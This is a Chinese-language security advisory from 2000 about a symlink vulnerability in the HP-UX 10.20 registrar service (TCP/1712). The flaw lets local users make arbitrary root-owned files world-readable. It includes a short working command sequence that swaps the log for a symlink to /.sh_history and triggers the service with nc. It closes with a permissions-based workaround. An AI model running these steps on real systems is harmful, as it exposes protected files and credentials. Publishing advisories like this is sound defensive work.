安全研究

安全漏洞
HP-UX registrar 服务符号链接漏洞

发布日期:2000-11-09
更新日期:2000-11-09

受影响系统:

HP-UX 10.20
描述:

HP-UX 10.20携带的registrar服务存在一个漏洞,允许本地用户读取文件系统中任意
文件,该服务监听TCP/1712口,使用日志文件/etc/opt/resmon/log/registrar.log

缺省安装后/etc/opt/resmon/log目录允许所有用户移动日志文件,通常到1712端口
的连接出现时,由root创建、写入日志文件。

恶意的本地用户可以移动已经存在的日志文件,创建一个名为registrar.log的符号
链接到任意的本来无权访问的文件,此后到1712端口的连接出现时,符号链接所指向
的文件权限被修改成0644(全局可读),日志数据追加在文件尾部。

这将带来极大的本地安全危害。

<* 来源:J.A. Gutierrez (spd@gtc1.cps.unizar.es) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


$ uname -sr
HP-UX B.10.20
$ cd /etc/opt/resmon/log
$ mv registrar.log registrar.log.orig
$ ls -l /.sh_history
-rw------- 1 root sys 3316 Sep 20 15:22 /.sh_history
$ ln -s /.sh_history registrar.log
$ nc hpux.example.com 1712 < /etc/motd
$ ls -l /.sh_history
-rw-r--r-- 2 root sys 3605 Nov 8 09:45 /.sh_history
$ rm -f registrar.log
$ mv registrar.log.orig registrar.log


建议:

临时解决办法:

NSFOCUS建议您确保只有root可访问/etc/opt/resmon/log目录

厂商补丁:

暂无



浏览次数:6258
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障